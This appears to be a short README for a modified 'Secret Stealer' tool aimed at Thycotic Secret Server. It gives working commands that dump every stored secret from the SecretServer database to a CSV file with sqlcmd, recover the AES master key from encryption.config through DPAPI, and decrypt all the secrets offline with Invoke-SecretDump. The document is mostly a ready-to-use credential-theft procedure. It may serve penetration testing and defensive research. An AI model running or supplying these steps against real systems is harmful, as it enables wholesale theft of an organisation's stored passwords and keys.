Quick modification of Thycotic Secret Stealer to pull AES master Key from DPAPI and then perform Decryption offline and spit output to CSV file.
The following SQLCMD will pull all the items from the Database
sqlcmd -d SecretServer -q "select s.SecretName, f.SecretFieldName, s.[Key], i.ItemValue from tbSecretItem as i JOIN tbSecret as s ON (s.SecretID = i.SecretID) JOIN tbSecretField as f on (i.SecretFieldID = f.SecretFieldID)" -W -w 1024 -s "," -o Data.csv
$masterKeys = Get-MasterKeysv104 -path C:\inetpub\wwwroot\SecretServer\encryption.config
$masterkeys.IsEncryptedWithDPAPI # should return true
$decrypted = [Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String($masterkeys.key256), $null, 'LocalMachine')
Invoke-SecretDump -SecretServerDataPath <PATH TO .csv> -MasterKey <AES MASTER KEY>
SecretServer v10.5 and greater changed how keys and IVs are stored. Extraction can be done by using the steps detailed in this issue. denandz/SecretServerSecretStealer#5 (comment)
Big thanks to curi0usJack and his original post here: https://www.trustedsec.com/blog/thycotic-secret-server-offline-decryption-methodology/